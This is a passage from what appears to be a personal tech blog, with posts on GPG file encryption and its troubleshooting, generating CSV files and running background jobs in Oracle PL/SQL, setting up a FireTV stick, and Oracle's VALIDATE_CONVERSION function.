sub   2048R/11DC569B 2020-04-09 [expires: 2020-04-16]

We have some data in a file called secret_message.txt that we want to send.
With the recipients public key imported, we can encrypt the file like this :

gpg --encrypt -r ponders@uu.ac.am secret_message.txt

At this point GPG will prompt you to confirm that you want to do this :

gpg: 11DC569B: There is no assurance this key belongs to the named user

pub  2048R/11DC569B 2020-04-09 Ponder Stibbons (Test generation of a GPG key) <ponders@uu.ac.am>
 Primary key fingerprint: 8238 E5BC C165 EA3D A927  39A3 BFFB 64EC 1DA0 A003
      Subkey fingerprint: 1BE6 DCF6 F041 988F D011  A19E F66F FD9F 11DC 569B

It is NOT certain that the key belongs to the person named
in the user ID.  If you *really* know what you are doing,
you may answer the next question with yes.

Use this key anyway? (y/N) y

We now have an encrypted copy of the file…

ls -l secret_message*
-rw-rw-r-- 1 mike mike  36 Apr  9 21:23 secret_message.txt
-rw-rw-r-- 1 mike mike 386 Apr  9 21:26 secret_message.txt.gpg

…which is encrypted :

file secret_message.txt.gpg 
secret_message.txt.gpg: PGP RSA encrypted session key - keyid: 9FFD6FF6 9B56DC11 RSA (Encrypt or Sign) 2048b .

Indeed, the .gpg version of the file contains this :

We can now transfer the encrypted file to the target server.

Decrypting the file

Once the file has reached its intended destination, it can be decrypted by the intended recipient using their private key.
Note that in order to do this, they need to know the passphrase used to create the key in the first place :

gpg --batch --yes --passphrase ************ -o secret_message.txt --logger-file secret.log secret_message.txt.gpg

…where ************ is the passphrase.

Once we run this we can see that we have generated a log file, together with the output file :

ls -l secret*
-rw-rw-r-- 1 mike mike 169 Apr  9 21:31 secret.log
-rw-rw-r-- 1 mike mike  36 Apr  9 21:31 secret_message.txt
-rw-rw-r-- 1 mike mike 386 Apr  9 21:29 secret_message.txt.gpg

If all has gone according to plan, the logfile should look something like :

2020-04-09 21:31:11 gpg[6431] encrypted with 2048-bit RSA key, ID 11DC569B, created 2020-04-09
      "Ponder Stibbons (Test generation of a GPG key) <ponders@uu.ac.am>"

Also, we should now be able to read the decrypted contents of the file :

cat secret_message.txt

Out of Cheese Error
Redo from start
When things go horribly wrong

In using GPG, I’ve found that error messages regarding packet sizes can be quite common when you first begin receiving files from a new source system. Perhaps the most cryptic of these is :

Ohhhh jeeee: mpi larger than packet

When this sort of thing crops up it appears to be the result of a file corruption. Either the key file used to encrypt the data, or the encrypted file itself, has somehow become corrupted.
There are at least two common ways for this to happen.

Transferring a text key from Windows to Linux

Remember that, in the example above, we used a text file to distribute our public key.
As you probably know, Windows uses two non-printing characters to terminate a line – Carriage Return (to move the cursor to the start of the line) and Line Feed (to move down to the next line). This means that each line break consists of the ASCII characters 13 and 10.
Linux uses a single new-line character – ASCII 10 – in which the Carriage Return is implicit.
Unfortunately, conversion between the two new-line conventions is not automatic. Therefore, if you find yourself transferring the text copy of a public key from a Windows system to a Linux system, you need to convert the new-lines to the Linux format using the dos2unix utility before using the key for GPG encryption.
In our example, we’d need to run :

dos2unix ponder_stibbons_pubkey.txt

Note : on the off-chance it’s not already installed, you can install this utility as follows :

On a RedHat-based system (RHEL, CentOS, Fedora etc) :

sudo yum install dos2unix

On a Debian-based system ( Debian, Ubuntu, Mint etc) :

sudo apt-get install dos2unix

One useful aspect of this utility is that it will not alter the file unless it finds new-lines that require changing.

Selecting the file transfer mode over sftp

Unless you are an aged person such as myself, who remembers the time when you’d ftp files on the command line, you probably won’t be aware that ftp (the forerunner to sftp) had different modes for text files (ascii) and binary files (binary). However, many modern sftp client tools do retain this distinction. Take FileZilla, for example :

As we have seen, GPG encrypted files are binary. If they are transferred in ASCII mode then they will become corrupted and trigger GPG’s packet-size obsession when you try to decrypt them.

If you’re hitting this issue then make sure that your sftp client isn’t being “helpful” by automatically selecting the incorrect transfer mode for your encrypted file.

Using FileZilla as an example, you can specify the correct mode when you invoke a Manual Transfer from the Transfer menu :

Hopefully you should now be free of file corruption and be able to proceed without having to re-initialize your FTB.

Generating CSV files from PL/SQL the Very Easy Way.

Thu, 2020-02-13 15:31

This post is dedicated to Morten Braten and William Robertson.
Thanks to both of you for saving me a lot of time (and typing)…

XML, YAML, JSON. When it comes to transferring data between systems, they’ve all been flavour of the month at one time or another. However, good old CSV is still the format of choice when the batch window opens.
Not only is it simple, it adds comparatively little overhead to the size of the data file being generated.

OK – CSV actually stands for “Comma-Separated Values” but these days it’s become synonymous with delimited data.
Whatever separator character you use, generating CSV is considerably easier these days…unless you’re using PL/SQL in a batch (as opposed to interactive) process.
That said, Connor McDonald does have a clever way of utilising the functionality available in a command line tool such as SQL*Plus by means of a DBMS_SCHEDULER job.

If for some reason that won’t work for you, it looks like you’re going to have to hack out some custom PL/SQL to get the job done…or you could have a look at a couple of the options available in what other technologies would refer to as “the ecosystem”.
What I’m going to cover is :

  • The pain of hand-cranking delimited SQL
  • A solution offered in Morten Braten’s Alexandria PL/SQL Utility Library
  • An alternative solution made available by William Robertson
  • The final PL/SQL procedure

    Hand-cranking delimited code

    We’re working in a Data Warehouse running on Oracle. We need to provide a data feed to a downstream system.
    The feed is comma separated with values enclosed by quotes.
    The query to generate the data for the feed is reasonably straight forward :

    select dept.department_id, dept.department_name,
        loc.city, coun.country_id
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';  -- this will be passed as a parameter in the run.  
    

    All ok so far. However, when it comes to tweaking the query to generate the output, things get a bit more fiddly.
    The query in the package will have to change to something like this :

    select '"'||dept.department_id||'",'
        ||'"'||dept.department_name||'",'
        ||'"'||loc.city||'",'
        ||'"'||coun.country_id||'"'
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';    
    

    Typically, these sorts of files are generated with dozens (sometimes hundreds) of attributes. If looking at all of those quotes and commas is going to give you a headache, you might seek to mitigate the worst effects by replacing the characters with their ASCII values :

    select chr(34)||dept.department_id||chr(34)||chr(44)
        ||chr(34)||dept.department_name||chr(34)||chr(44)
        ||chr(34)||loc.city||chr(34)||chr(44)
        ||chr(34)||coun.country_id||chr(34)
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';    
    

    The double-quotes surrounding the data values are designed to escape any commas in the data and prevent them from being read as field terminators. Unfortunately, this doesn’t help much if the data also contains double-quotes. For this reason, I tend to prefer a pipe character as a delimiter. This allows us to dispense with the double-quotes. As a double-pipe is the SQL concatenation operator, let’s use the ASCII value instead for the delimiter itself :

    select dept.department_id||chr(124)
        ||dept.department_name||chr(124)
        ||loc.city||chr(124)
        ||coun.country_id
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';      
    

    Wouldn’t it be nice if there were some way we could just persuade Oracle to magically write our delimiters for us ?
    Well, I don’t know about Oracle, but Morten Braten will have a go for you…

    The Alexandria CSV_UTIL_PKG package

    As with most Alexandria packages, there’s a demo on how to use CSV_UTIL_PKG in demos/csv_util_pkg_demo.sql.
    However, as explained in Morten’s post on this subject, you need to create some types first …

    create type t_str_array as table of varchar2(4000);
    /
     
    create type t_csv_line as object (
      line_number  number,
      line_raw     varchar2(4000),
      c001         varchar2(4000),
      c002         varchar2(4000),
      c003         varchar2(4000),
      c004         varchar2(4000),
      c005         varchar2(4000),
      c006         varchar2(4000),
      c007         varchar2(4000),
      c008         varchar2(4000),
      c009         varchar2(4000),
      c010         varchar2(4000),
      c011         varchar2(4000),
      c012         varchar2(4000),
      c013         varchar2(4000),
      c014         varchar2(4000),
      c015         varchar2(4000),
      c016         varchar2(4000),
      c017         varchar2(4000),
      c018         varchar2(4000),
      c019         varchar2(4000),
      c020         varchar2(4000)
    );
    /
     
    create type t_csv_tab as table of t_csv_line;
    /
    

    With these types in place, we can install the package from the Alexandria GitHub repo.
    The files we’re looking for are under the ora directory:

    • csv_util_pkg.pks
    • csv_util_pkg.pkb

    Download them and run them in the order they are listed here ( the .pks is the header and the .pkb is the body).

    Now, we can take some of the commas out of our code…

    select csv_util_pkg.array_to_csv(
        t_str_array(
            dept.department_id, dept.department_name,
            loc.city, coun.country_id))
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';
    

    By default, the results are output using a comma as the separator. However, we can change this easily enough:

     
    select csv_util_pkg.array_to_csv(
        t_str_array(dept.department_id, dept.department_name, loc.city, coun.country_id),
        chr(124))
    from departments dept
    inner join locations loc
        on dept.location_id = loc.location_id
    inner join countries coun
        on loc.country_id = coun.country_id  
    inner join regions reg
        on reg.region_id = coun.region_id
    where reg.region_name = 'Americas';
    

    The output is pretty much what we’re looking for :

    60|IT|Southlake|US
    50|Shipping|South San Francisco|US
    10|Administration|Seattle|US
    30|Purchasing|Seattle|US
    90|Executive|Seattle|US
    100|Finance|Seattle|US
    110|Accounting|Seattle|US
    120|Treasury|Seattle|US
    130|Corporate Tax|Seattle|US
    140|Control And Credit|Seattle|US
    150|Shareholder Services|Seattle|US
    160|Benefits|Seattle|US
    170|Manufacturing|Seattle|US
    180|Construction|Seattle|US
    190|Contracting|Seattle|US
    200|Operations|Seattle|US
    210|IT Support|Seattle|US
    220|NOC|Seattle|US
    230|IT Helpdesk|Seattle|US
    240|Government Sales|Seattle|US
    250|Retail Sales|Seattle|US
    260|Recruiting|Seattle|US
    270|Payroll|Seattle|US
    20|Marketing|Toronto|CA
    

    Now all you need to do is put this into your PL/SQL procedure and write some code to save it to a file ( possibly using the Alexandria FILE_UTIL_PKG package).
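
    If you do go down that route, a minimal sketch might look something like this. Note that the APP_FILES directory and the americas_depts.csv file name are just placeholders, and I’m assuming that CSV_UTIL_PKG and T_STR_ARRAY are accessible from the current schema :

    declare
        fh utl_file.file_type;
    begin
        fh := utl_file.fopen('APP_FILES', 'americas_depts.csv', 'w', 32767);
        for rec in (
            select csv_util_pkg.array_to_csv(
                t_str_array(dept.department_id, dept.department_name, loc.city, coun.country_id),
                chr(124)) as line
            from departments dept
            inner join locations loc
                on dept.location_id = loc.location_id
            inner join countries coun
                on loc.country_id = coun.country_id
            inner join regions reg
                on reg.region_id = coun.region_id
            where reg.region_name = 'Americas')
        loop
            -- write each delimited line to the feed file
            utl_file.put_line(fh, rec.line);
        end loop;
        utl_file.fclose(fh);
    end;
    /
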
    If that seems like too much effort though…

    William Robertson’s CSV package

    Whilst the Alexandria package is a bit of an all-rounder, William Robertson has produced something that’s rather more tailored to producing CSV files.

    The package – simply called CSV – has a function that produces delimited format from a refcursor. It also contains a procedure to write csv data to a file.
    Let’s take a closer look…

    Installation of the package simply involves downloading the code from here, and running it. Both the package header and body are in a single file – csv.pkg.

    The package’s REPORT function takes a slightly different approach in that it takes a ref cursor as an argument :

    select column_value
    from table(csv.report(cursor(
        select dept.department_id, dept.department_name,
            loc.city, coun.country_id
        from departments dept
        inner join locations loc
            on dept.location_id = loc.location_id
        inner join countries coun
            on loc.country_id = coun.country_id  
        inner join regions reg
            on reg.region_id = coun.region_id
        where reg.region_name = 'Americas')))
    /    
    

    Once again, the delimiter character is comma by default. Once again, we can override this :

    select column_value
    from table(csv.report(cursor(
        select dept.department_id, dept.department_name,
            loc.city, coun.country_id
        from departments dept
        inner join locations loc
            on dept.location_id = loc.location_id
        inner join countries coun
            on loc.country_id = coun.country_id  
        inner join regions reg
            on reg.region_id = coun.region_id
        where reg.region_name = 'Americas'), 
        chr(124)))
    /    
    

    We can go even further. You can add common things that you may need to include in a csv that’s serving as a feed file for another system. These include :

    • a header record with a delimited list of attributes
    • a label attribute for each row of data to make these rows easier to identify for the program loading the csv
    • a rowcount as a trailer record

    All of which can be accomplished thus :

    select column_value
    from table(csv.report(cursor(
        select dept.department_id, dept.department_name,
            loc.city, coun.country_id
        from departments dept
        inner join locations loc
            on dept.location_id = loc.location_id
        inner join countries coun
            on loc.country_id = coun.country_id  
        inner join regions reg
            on reg.region_id = coun.region_id
        where reg.region_name = 'Americas'), 
        p_separator => chr(124),
        p_label => 'DATA',
        p_heading => 'Y',
        p_rowcount => 'Y'))
    /    
    
    The output now includes a heading record, a DATA label on each row and a trailing record containing the row count, which is the same layout we’ll see in the file contents further down.
    

    Not only that, but the package also facilitates creating the file itself…

    Generating a file from the CSV package

    First of all, we need access to a directory. So, the DBA needs to do something like :

    grant read, write on directory app_files to hr;
    

    Now, connected as HR, we can create a PL/SQL procedure to generate our csv files like this :

    create or replace procedure depts_by_region( i_region regions.region_name%type)
    as
        l_fname varchar2(100);
        rc sys_refcursor;
    begin
        
        l_fname := i_region||'_depts.csv';
        
        open rc for
        select dept.department_id, dept.department_name,
            loc.city, coun.country_id
        from departments dept
        inner join locations loc
            on dept.location_id = loc.location_id
        inner join countries coun
            on loc.country_id = coun.country_id  
        inner join regions reg
            on reg.region_id = coun.region_id
        where reg.region_name = i_region; 
        
        csv.write_file(
            p_dataset => rc,
            p_separator => chr(124),
            p_label => 'DATA',
            p_heading => 'Y',
            p_rowcount => 'Y',
            p_directory => 'APP_FILES',
            p_filename => l_fname);
    end;
    /
    

    …and run it like this :

    begin
        depts_by_region('Americas');
    end;
    /
    

    Sure enough, when we look on the server, we can see :

    [mike@frea ~]$ cd /opt/oracle/app_files/
    [mike@frea app_files]$ ls -l *.csv
    -rw-r--r-- 1 oracle oinstall 840 Feb 11 20:56 Americas_depts.csv
    

    …and the file looks like this :

    HEADING|DATA|DEPARTMENT_ID|DEPARTMENT_NAME|CITY|COUNTRY_ID
    DATA|60|IT|Southlake|US
    DATA|50|Shipping|South San Francisco|US
    DATA|10|Administration|Seattle|US
    DATA|30|Purchasing|Seattle|US
    DATA|90|Executive|Seattle|US
    DATA|100|Finance|Seattle|US
    DATA|110|Accounting|Seattle|US
    DATA|120|Treasury|Seattle|US
    DATA|130|Corporate Tax|Seattle|US
    DATA|140|Control And Credit|Seattle|US
    DATA|150|Shareholder Services|Seattle|US
    DATA|160|Benefits|Seattle|US
    DATA|170|Manufacturing|Seattle|US
    DATA|180|Construction|Seattle|US
    DATA|190|Contracting|Seattle|US
    DATA|200|Operations|Seattle|US
    DATA|210|IT Support|Seattle|US
    DATA|220|NOC|Seattle|US
    DATA|230|IT Helpdesk|Seattle|US
    DATA|240|Government Sales|Seattle|US
    DATA|250|Retail Sales|Seattle|US
    DATA|260|Recruiting|Seattle|US
    DATA|270|Payroll|Seattle|US
    DATA|20|Marketing|Toronto|CA
    ROW_COUNT|DATA|24
    

    There are some limitations. For example, William points out that any row that’s longer than 4000 characters will cause the package to break. However, unless you’re generating fairly “wide” lines, he’s pretty much written your code for you.

    Running a “background” job in PL/SQL

    Mon, 2020-01-20 14:11

    Teddy has observed the recent General Election campaign with some interest and has concluded that he has what it takes to be the next Prime Minister.

    It’s not just the haircut, which does now look extremely Prime Ministerial…

    Politics is a robust business but Teddy’s more than capable of playing “ruff” :

    He firmly believes in the need to streamline Government at Cabinet level, which has the incumbent Chief Mouser to the Cabinet Office a little nervous.
    He’s also well used to being followed around by a “pooper scooper”. And not to put too fine a point on it, there’s more than one reason that he’s known as a “shaggy” dog.

    If he’s going to make it in politics, Teddy knows that he doesn’t have time to waste waiting for that pesky long-running job he’s just started. Oh no, he needs to use his evenings to get on with building his power base.
    Fortunately, Oracle facilitates detached execution of PL/SQL blocks by means of the DBMS_SCHEDULER package. Now, I know what you’re thinking, that’s going to involve a lot of fiddly setup with schedules and windows and chains and stuff. Well, you may be pleasantly surprised…

    The package

    Teddy has a packaged procedure that he needs to test :

    create or replace package long_runner as
        procedure write_log( 
            i_msg_type in logs.message_type%type,
            i_msg logs.message%type);
            
        procedure marathon( i_sleep in pls_integer, i_string in varchar2);
    end long_runner;
    /
        
    create or replace package body long_runner as
        procedure write_log( 
            i_msg_type in logs.message_type%type,
            i_msg logs.message%type)
        is
        pragma autonomous_transaction;
        begin
            insert into logs( message_type, message)
            values( i_msg_type, i_msg);
            
            commit;
        end write_log;    
            
        procedure marathon( i_sleep in pls_integer, i_string in varchar2)
        is
            l_msg logs.message%type;
        begin
            write_log('INFO', 'i_sleep : '||i_sleep);
            write_log('INFO', 'i_string : '||i_string);
            for i in 1..26 loop
                l_msg := null;
                for j in 1..i loop
                    l_msg := l_msg||'z';
                end loop;
                write_log('INFO', initcap( l_msg));
                dbms_session.sleep( i_sleep);
            end loop;
            write_log('INFO', 'Completed');
        end marathon;    
    end long_runner;
    /
    

    Normally, he’d kick it off in a simple PL/SQL block :

    begin
        long_runner.marathon( 30, 'Teddy for PM!');
    end;
    /
    

    Unfortunately, it’s almost time to leave for the day and he doesn’t trust Windows not to do an update and reboot itself.

    Fortunately, Teddy’s not above a (quick and) dirty trick…

    declare
        stmnt_block varchar2(4000);
    begin
        stmnt_block := q'[
            begin
                long_runner.marathon( 30, 'Teddy for PM!');
            end;
            ]';
            
        dbms_scheduler.create_job(
            job_name => 'checkit_tomorrow',
            job_type => 'PLSQL_BLOCK',
            job_action => stmnt_block,
            start_date => sysdate, -- run now
            enabled => true,
            auto_drop => true,
            comments => 'My background job - because I have a life');
    end;
    /
    

    He’s created a DBMS_SCHEDULER job on-the-fly. The job is set to run immediately by setting the start_date to now. The job will be dropped once it’s completed ( auto_drop set to true).

    Run this and it returns almost immediately. That’s because the job has merely been submitted; the long-running PL/SQL block is now executing in the background.
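
    Incidentally, if you’d rather not hard-code the parameter values inside the PL/SQL block, a variation on this theme ( just a sketch, not something Teddy actually ran) is to point the job straight at the packaged procedure and pass the arguments separately :

    declare
        v_job_name varchar2(30) := 'checkit_tomorrow_args';
    begin
        -- create the job disabled so that we can attach the argument values first
        dbms_scheduler.create_job(
            job_name => v_job_name,
            job_type => 'STORED_PROCEDURE',
            job_action => 'LONG_RUNNER.MARATHON',
            number_of_arguments => 2,
            start_date => systimestamp,
            enabled => false,
            auto_drop => true,
            comments => 'Same job, but with the arguments passed in');

        dbms_scheduler.set_job_argument_value( v_job_name, 1, '30');
        dbms_scheduler.set_job_argument_value( v_job_name, 2, 'Teddy for PM!');

        -- enabling the job submits it for immediate execution
        dbms_scheduler.enable( v_job_name);
    end;
    /
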
    If we want to check progress, we can take a look at the scheduler views…

    Tracking job progress

    When the job starts, we can see it in USER_SCHEDULER_JOBS :

    select to_char(start_date, 'DD-MON-YYYY HH24:MI') as start_date, 
        state
    from user_scheduler_jobs
    where job_name = 'CHECKIT_TOMORROW'
    /
    
    START_DATE                 STATE               
    -------------------------- --------------------
    20-JAN-2020 19:45          RUNNING             
    

    If, for any reason, Teddy needs to terminate the job, he can simply run :

    exec dbms_scheduler.stop_job('CHECKIT_TOMORROW', true);
    

    As noted previously, the job will drop itself on completion at which point it will disappear from these views.

    To see the outcome of the job :

    select log_id, log_date, status
    from user_scheduler_job_log
    where job_name = 'CHECKIT_TOMORROW';
    
        LOG_ID LOG_DATE                         STATUS                        
    ---------- -------------------------------- ------------------------------
         53216 20-JAN-20 19.50.01.854589000 GMT SUCCEEDED                                          
    

    Sometimes we need further details. For example, if the job failed, the error stack will be included in the
    ERRORS column of the USER_SCHEDULER_JOB_RUN_DETAILS view :

    select run_duration, status,
        error#, additional_info, errors
    from user_scheduler_job_run_details
    where job_name = 'CHECKIT_TOMORROW'
    and log_id = 53216; -- log id from user_scheduler_job_log
    
    RUN_DURATION        STATUS                             ERROR# ADDITIONAL_INFO      ERRORS              
    ------------------- ------------------------------ ---------- -------------------- --------------------
    +00 00:05:00.000000 SUCCEEDED                               0                                     
    

    In this case however, it looks like Teddy’s run was perfect…just like it will be in 2024.

    Upcycling and old TV to a Smart TV with an Amazon FireTV Stick

    Mon, 2020-01-13 15:53

    Once upon a time, a TV was simply something you plugged into an aerial socket and used to watch whatever broadcasters were prepared to show at any given time.
    With the rise of streaming, TVs have now become “smart”. Well, smartish. I mean, some of them use really slick software and have lots of Apps that enable you to stream from a variety of sources.
    Others are a bit less sophisticated and have limited access to such Apps.
    Not only that, the world is now full of the old type of “dumb” but perfectly serviceable TVs.
    So, if you want to :

    • Revitalise an old non-smart TV
    • Make a new not-so-smart TV smarter
    • Place a TV somewhere that’s not within easy reach of an aerial socket

    …then help may be at hand. There are a number of devices you can plug into a TV to beef up its smartness.
    As these devices stream content over the internet, you don’t need an aerial to make use of them.
    Furthermore, they are a fraction of the cost of buying a new Smart TV.

    What follows is an account of how I’ve setup an Amazon Fire TV Stick and used it to access the wealth of streaming content that’s freely available in the UK, as well as some of the main subscription services…

    Why FireTV ?

    Let’s be clear here, I’ve not done any extensive research into streaming sticks so I’m not saying that FireTV is the best. However, it does fulfill all of our requirements whilst being a very cheap way of “smartening up” your TV. It also happens to be the only one I’ve used, although I have used it on several TVs now, with uniformly impressive results.

    Installation pre-requisites

    First up you’re going to need a TV with an HDMI port.
    You’ll also need access to a reasonable broadband connection. At the start of 2020, let’s say that anything over 12Mb/sec should be good enough if you’re not sharing the connection, and superfast broadband speeds (20Mb/sec and up) if you are.
    You can use slower speeds but this can be prone to buffering.

    Oh yes, you’ll also need one of these :

    firetv

    Other stuff it would be useful to have to hand :

    • Your Wifi network name and password
    • Your Amazon account – if you have one – don’t worry if you haven’t
    • Your BBC Account – if you have one

    One point to note is that, if you do happen to have an Amazon Prime account, there’s a whole bunch of streaming content that is available to you for free so it makes sense to use this account when setting up the FireTV.
    If you don’t have one, it’s not a problem, as we’ll see shortly…

    Initial Setup

    Plug the FireTV stick into its power cable, then into a mains socket. Then connect it to an HDMI port on your TV.

    Now turn on the TV and play hunt-the-HDMI-port to find out which one your FireTV is plugged into.

    FireTV will now take you through the initial setup process which consists of :

    1. Set Language (English UK in my case)
    2. Set up Wifi to connect to your network
    3. Sign in with your Amazon Account ( or create a new one) – NOTE – you can set up an account without providing any payment details !
    4. Select the brand of TV you are using so that the power and volume buttons on the FireTV remote will work

    At this point the setup will give you the opportunity to install some of the more popular apps. Don’t worry if you can’t find what you’re looking for, because we’ll add a lot more apps shortly.
    So, select Netflix, YouTube and anything else being offered that takes your fancy.

    Finally, we have the FireTV Home screen. Before we do anything else however, we need to go to the menu that’s displayed at the top of the screen and select Settings.
    Scroll across and select My Fire TV.
    Then select About from the list that pops up.
    Finally you need to select the option Install Update if it’s there.

    If there is a pending update, FireTV will download it and then either automatically re-start or prompt you to re-start it.

    Once it’s re-booted, you can now download your apps.
    Back on the Home screen menu, navigate to Apps. This opens up the FireTV app store.
    If you navigate to Categories then Entertainment, you’ll find the TV services you need to access a significant chunk of the Freeview channels, along with some subscription services.

    Some of these apps will require registration ( or use of an existing account), however all of the ones listed below can be installed and used without having to pay anything.
    Note that, as a TV License payer, you will have access to a veritable treasure trove of content on BBC iPlayer, including classic programs, box sets and even movies.

    Streaming Freeview Channels

    The mapping between Freeview Channels and Apps is as follows :

    Channel            App          Notes
    ------------------ ------------ ------------
    BBC 1              iPlayer
    BBC 2              iPlayer
    ITV 1              ITV Hub
    Channel 4          All 4        Catchup only
    Channel 5          My 5         Catchup only
    ITV 2              ITV Hub
    BBC 4              iPlayer
    ITV 3              ITV Hub
    Quest              TV Player
    E 4                All 4        Catchup only
    Really             TV Player
    More 4             All 4        Catchup only
    Dave               UK TV Play   Catchup only
    Drama              UK TV Play   Catchup only
    5 USA              My 5         Catchup only
    ITV 4              ITV Hub
    Yesterday          UK TV Play   Catchup only
    ITVBe              ITV Hub
    5 Star             My 5         Catchup only
    DMax               TV Player
    Food Network       TV Player
    Home               TV Player
    47                 TV Player
    Paramount Network  My 5         Catchup only
    5 Select           My 5         Catchup only
    Blaze              My 5         Catchup only
    PBS America        My 5         Catchup only
    CBBC               iPlayer
    CBeebies           iPlayer
    CITV               ITV Hub
    BBC News           iPlayer
    BBC Parliament     iPlayer
    Sky News           Sky News

    You can stream some channels in more than one App. For example BBC1 can be streamed live on TVPlayer or iPlayer.

    Other useful apps

    If you’re a BT TV subscriber, you can use the BT App to access some of the content and save yourself buying an extra set-top box. Note that BT do charge for access via the FireTV stick.
    Also, if you happen to have a Plex media server configured, well, there’s an App for that (under the Apps and Games category).

    In fact, if you can’t find an app, it’s always worth asking Alexa.
    Right, back to my catch-up of a repeat of QI on Dave…

    Putting VALIDATE_CONVERSION front and centre, or possibly center

    Thu, 2019-12-19 13:35

    I recently had an interesting conversation with Suzanne, a native of Pittsburgh PA, about how the Americans and British spell some words differently.
    Adding some local colour ( color) to the discussion, Suzanne recounted the story of when the US Postal service, seeking to save money on printing, proposed removing “superfluous” characters from place names.
    Well, the burghers of Pittsburgh weren’t having any of that thank-you-very-much and so the City’s name remains unabridged to this day. The denizens of Harrisburg weren’t so fortunate.
    Whilst we may be separated by a common language, as programmers who work with Oracle, Suzanne and I do share the challenge of loading data into tables when the format of that data may not be entirely what we were expecting.
    If you’re fortunate enough to inhabit the sunlit uplands of Oracle 12c R2 and beyond, we’re about to explore the shiny new VALIDATE_CONVERSION function which promises to make your life that little bit easier.
    For those languishing on 11g, we’ll explore how we might implement a similar function in PL/SQL.

    The Data to be converted

    Let’s pretend we’ve loaded some data from a file. By definition the actual data as it exists in the file is a collection of character strings. We’ve taken a permissive approach to the load (i.e. load everything if at all possible). The target table for our load is :

    create table historic_events_stg(
        id varchar2(4000),
        event_desc varchar2(4000),
        event_ts varchar2(4000))
    /    
    

    A DML representation of the data load would look like this :

    insert into historic_events_stg(id, event_desc, event_ts)
        select 'ONE', q'[Webster's Dictionary first published]', 'April 14 1828' from dual union all
        select '2', q'[Wright Brother's first flight]', 'DEC-17-1903' from dual union all
        select '3', 'NHS established in the UK', '5 July 1948' from dual union all
        select '4', 'First Manned Moon Landing',  'July 20 1969 20:17:40 UTC' from dual union all
        select '5', 'Tim Berners-Lee proposes the World Wide Web',  '19901112' from dual union all
        select '6', q'[JK Rowling's first Harry Potter book published]', '30-JUN-1997' from dual union all
        select '7', 'iPhone released in the USA', '06/29/2007' from dual;
    commit;    
    

    Now, we’d like to load the data from the staging table into our application table which looks like this :

    create table historic_events (
        id number,
        event_desc varchar2(4000),
        event_ts timestamp with time zone)
    /    
    

    In 11g and previously this might prove a bit tricky without the use of something like Log Errors :

    insert into historic_events select * from historic_events_stg;
    
    ERROR at line 1:
    ORA-01722: invalid number
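
    For reference, the Log Errors route mentioned above would look something like this ( a sketch rather than anything from the original load, using the default error table name generated by DBMS_ERRLOG) :

    -- create the default error logging table ( ERR$_HISTORIC_EVENTS)
    exec dbms_errlog.create_error_log( dml_table_name => 'HISTORIC_EVENTS')

    insert into historic_events
        select * from historic_events_stg
        log errors into err$_historic_events ('permissive load')
        reject limit unlimited;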
    
    

    Sometimes, it would be nice if we could just see which values are going to cause problems before we even attempt to load the data…

    The VALIDATE_CONVERSION function

    Let’s see what might be causing our error…

    select id, 
        validate_conversion(id as number) as isnum
    from historic_events_stg;
    

    Yes, it’s that simple, just ask validate_conversion what happens when you try to convert all of the IDs in the table to numbers :

    ID  ISNUM
    --- -----
    ONE     0
    2       1
    3       1
    4       1
    5       1
    6       1
    7       1
    

    If the conversion is going to succeed, the function returns a 1. Otherwise, it returns a zero.
    It works for DATES too, although some extra effort may be needed.

    In my current session, the NLS_DATE_FORMAT is :

    select sys_context('userenv', 'nls_date_format') from dual;
    
    SYS_CONTEXT('USERENV','NLS_DATE_FORMAT')
    ----------------------------------------
    DD-MON-YYYY
    

    So, when I check my date strings in the staging table, most of them fail to pass muster…

    select event_ts, 
        validate_conversion(event_ts as date) as isdate
    from historic_events_stg; 
    
    EVENT_TS                  ISDATE
    ------------------------- ------
    April 14 1828                  0
    DEC-17-1903                    0
    5 July 1948                    1
    July 20 1969 20:17:40 UTC      0
    19901112                       0
    30-JUN-1997                    1
    06/29/2007                     0
    

    We can specify the date format we’re validating against, so we get a slightly different result with :

    select event_ts, 
        validate_conversion(event_ts as date, 'MON-DD-YYYY') as isdate
    from historic_events_stg;
    
    EVENT_TS                       ISDATE
    ------------------------------ ------
    April 14 1828                       1
    DEC-17-1903                         1
    5 July 1948                         0
    July 20 1969 20:17:40 UTC           0
    19901112                            0
    30-JUN-1997                         0
    06/29/2007                          0
    

    Unfortunately, it looks like we’re going to have to go through the record set and re-format most of the dates.
    OK, it’s more likely that you’d go back to whoever is giving you the feed and ask them to just pick one date format.

    The other possibility is to use the function to select the correct format to use for each conversion…

    select event_ts,
        case 
            when validate_conversion( event_ts as date, 'MON-DD-YYYY') = 1 
                then to_date(event_ts, 'MON-DD-YYYY')
            when validate_conversion( event_ts as date, 'DD Month YYYY') = 1 
                then to_date( event_ts, 'DD Month YYYY')
            when validate_conversion( event_ts as date, 'DD-MON-YYYY') = 1 
                then to_date( event_ts, 'DD-MON-YYYY')
            when validate_conversion( event_ts as date, 'MM/DD/YYYY') = 1 
                then to_date(event_ts, 'MM/DD/YYYY')
            when validate_conversion( event_ts as date, 'YYYYMMDD') = 1 
                then to_date(event_ts, 'YYYYMMDD')
            when validate_conversion(event_ts as timestamp with time zone, 'MON DD YYYY HH24:MI:SS TZR') = 1 
                then to_timestamp_tz(event_ts, 'MON DD YYYY HH24:MI:SS TZR')
        end as converted_event_ts
    from historic_events_stg; 
    
    EVENT_TS                       CONVERTED_EVENT_TS                                
    ------------------------------ --------------------------------------------------
    April 14 1828                  14-APR-28 00.01.00.000000000 EUROPE/LONDON        
    DEC-17-1903                    17-DEC-03 00.00.00.000000000 EUROPE/LONDON        
    5 July 1948                    05-JUL-48 00.00.00.000000000 EUROPE/LONDON        
    July 20 1969 20:17:40 UTC      20-JUL-69 20.17.40.000000000 UTC                  
